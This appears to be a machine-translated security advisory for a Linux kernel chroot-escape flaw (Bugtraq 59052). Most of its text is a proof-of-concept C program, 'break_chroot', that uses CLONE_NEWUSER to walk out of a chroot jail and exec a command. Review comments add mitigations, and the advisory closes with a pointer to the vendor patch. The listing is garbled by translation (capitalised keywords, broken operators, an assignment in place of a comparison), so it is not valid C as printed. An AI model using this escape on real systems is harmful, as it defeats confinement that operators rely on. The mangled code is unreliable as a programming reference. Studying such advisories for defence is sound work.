Release date:
Updated on:
Affected Systems:
Linux kernel
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59052
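The Linux kernel is the core of the Linux operating system.
The Linux kernel has multiple security bypass vulnerabilities. An attacker can exploit them to bypass certain security restrictions and perform unauthorized operations. Judging by its usage text, the test program below concerns one of them: a process confined by chroot that creates a new user namespace (CLONE_NEWUSER).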
<* Source: Andrew Lutomirski
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# Define _ GNU_SOURCE
# Include <unistd. h>
# Include <sched. h>
# Include <sys/types. h>
# Include <sys/wait. h>
# Include <fcntl. h>
# Include <stdio. h>
# Include <string. h>
# Include <err. h>
# Ifndef CLONE_NEWUSER
# Define CLONE_NEWUSER 0x10000000
# Endif
/*
 * printcwd: print the current working directory, but only when the length
 * of the path differs from the length recorded on the previous call.
 *
 * NOTE(review): this listing was mangled by machine translation (capitalised
 * keywords, spaces inserted inside operators and string literals) and is not
 * valid C as printed. The tokens are left exactly as the page shows them.
 */
Static void printcwd (void)
{
/* This is fuugly .*/
/* Length of the last path seen; -1 presumably means "nothing seen yet". */
Static int lastlen =-1;
Char buf [8192];
If (getcwd (buf, sizeof (buf ))){
/* Only the length is compared, not the text, so two different paths of
 * equal length would be printed once. */
If (strlen (buf )! = Lastlen)
Printf ("% s \ n", buf );
Lastlen = strlen (buf );
} Else {
/* A getcwd failure is only warned about; the caller carries on. */
Warn ("getcwd ");
}
}
/*
 * fn: body of the child that main() starts through clone().
 *
 * As printed, it opens "/", calls unshare() for CLONE_NEWUSER and then for
 * CLONE_NEWNS, returns to the opened directory, walks upward with
 * chdir("..") while printing each directory, and finally places a
 * descriptor for the directory it reached on descriptor number 3 before
 * exiting with status 0.
 *
 * unused: the clone() argument; it is not read here.
 *
 * NOTE(review): the listing was mangled by machine translation and is not
 * valid C as printed; the tokens are left exactly as the page shows them.
 */
Int fn (void * unused)
{
Int I;
Int fd;
/* Take a handle on "/" before any namespace is changed. */
Fd = open ("/", O_RDONLY | O_DIRECTORY );
/* NOTE(review): "fd =-1" as printed is an assignment; the original
 * presumably compared against -1. The error text also names "." although
 * the path opened above is "/". */
If (fd =-1)
Err (1, "open (\".\")");
/* Both unshare() calls are fatal on failure. This is the step a kernel
 * policy can refuse. NOTE(review): patched kernels are understood to reject
 * user-namespace creation from a chrooted process, and a host that does not
 * need user namespaces can set user.max_user_namespaces to 0; confirm both
 * against the kernel in use. Auditing unshare()/clone() calls that carry
 * CLONE_NEWUSER from confined services gives a detection point. */
If (unshare (CLONE_NEWUSER )! = 0)
Err (1, "unshare (CLONE_NEWUSER )");
If (unshare (CLONE_NEWNS )! = 0)
Err (1, "unshare (CLONE_NEWNS )");
/* Go back to the directory opened before the unshare() calls. */
If (fchdir (fd )! = 0)
Err (1, "fchdir ");
Close (fd );
/* At most 100 steps upward; the walk stops at the first chdir failure. */
For (I = 0; I <100; I ++ ){
Printcwd ();
If (chdir ("..")! = 0 ){
Warn ("chdir ");
Break;
}
}
/* Open the directory reached (O_PATH: a handle only) and make sure it sits
 * on descriptor 3, the number main() later hands to fchdir(). */
Fd = open (".", O_PATH | O_DIRECTORY );
/* NOTE(review): same "=-1" garbling as above. */
If (fd =-1)
Err (1, "open (\".\")");
If (fd! = 3 ){
If (dup2 (fd, 3) =-1)
Err (1, "dup2 ");
Close (fd );
}
/* Exit status 0 is what main() checks for after wait(). */
_ Exit (0 );
}
/*
 * main: run fn() in a child that shares this process's descriptor table,
 * then change directory to descriptor 3 and exec the command given in argv.
 *
 * argv[1] is the program to execute; argv + 1 becomes its argument vector.
 * Returns 1 when no command is given. Every other failure ends the process
 * through err()/errx() with status 1.
 *
 * NOTE(review): the listing was mangled by machine translation and is not
 * valid C as printed; the tokens are left exactly as the page shows them.
 * SIGCHLD, SIG_DFL and signal() need <signal.h>, which is not among the
 * include lines printed on the page.
 */
Int main (int argc, char ** argv)
{
Int dummy;
If (argc <2 ){
/* The usage text itself states the limit of the demonstration: "/" still
 * resolves to the jail root afterwards. */
Printf ("usage: break_chroot command args... \ n"
"You won't be entirely out of jail./is still the jail root. \ n ");
Return 1;
}
/* Free descriptor 3 so that the number is available to the child. */
Close (3 );
/* NOTE(review): signal() returns the previous handler, and failure is
 * SIG_ERR; comparing the result with 0 looks like it treats any earlier
 * non-default handler as an error. Confirm against the original. */
If (signal (SIGCHLD, SIG_DFL )! = 0)
Err (1, "signal ");
/* CLONE_FILES makes the child share this descriptor table, which is why
 * the descriptor 3 set up in fn() is usable below.
 * NOTE(review): "& dummy" is passed as the child stack. clone() expects a
 * pointer into a properly sized stack region, so the address of a single
 * int is fragile at best. */
If (clone (fn, & dummy, CLONE_FILES | SIGCHLD, 0) =-1)
Err (1, "clone ");
Int status;
/* NOTE(review): "=-1" here and above is garbled; presumably a comparison. */
If (wait (& status) =-1)
Err (1, "wait ");
/* NOTE(review): "|" as printed is a bitwise OR; the original presumably
 * used a logical OR between the two conditions. */
If (! WIFEXITED (status) | WEXITSTATUS (status )! = 0)
Errx (1, "child failed ");
/* Adopt the directory the child left on descriptor 3, then drop it. */
If (fchdir (3 )! = 0)
Err (1, "fchdir ");
Close (3 );
Execv (argv [1], argv + 1 );
/* Reached only when execv fails. NOTE(review): argv[1] is passed as the
 * format string; err(1, "%s", argv[1]) would avoid interpreting '%' in it. */
Err (1, argv [1]);
/* Not reached: err() does not return. */
Return 0;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Linux
-----
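The vendor has released a patch that fixes this security problem. Download it from the vendor's homepage, or install the fixed kernel through your distribution's security updates and confirm the running kernel version after reboot:
http://www.kernel.org/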